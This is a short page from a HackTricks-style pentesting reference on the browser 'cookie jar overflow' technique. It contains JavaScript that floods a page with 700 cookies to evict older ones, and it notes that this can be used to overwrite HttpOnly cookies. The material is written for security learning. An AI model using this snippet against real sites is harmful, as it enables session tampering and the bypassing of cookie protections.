🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ€– HackTricks / Cookie Jar Overflow

Cookie Jar Overflow

{{#include ../../banners/hacktricks-training.md}}

The browsers have a limit on the number of cookies that they can store for a page. Then, if for some reason you need to make a cookie disappear, you can overflow the cookie jar as the oldest ones will be deleted before:

// Set many cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

Notice, that third party cookies pointing to a different domain won't be overwritten.

⚠️ Caution
This attack can also be used to **overwrite HttpOnly cookies as you can delete it and then reset it with the value you want**. Check this in [**this post with a lab**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).

{{#include ../../banners/hacktricks-training.md}}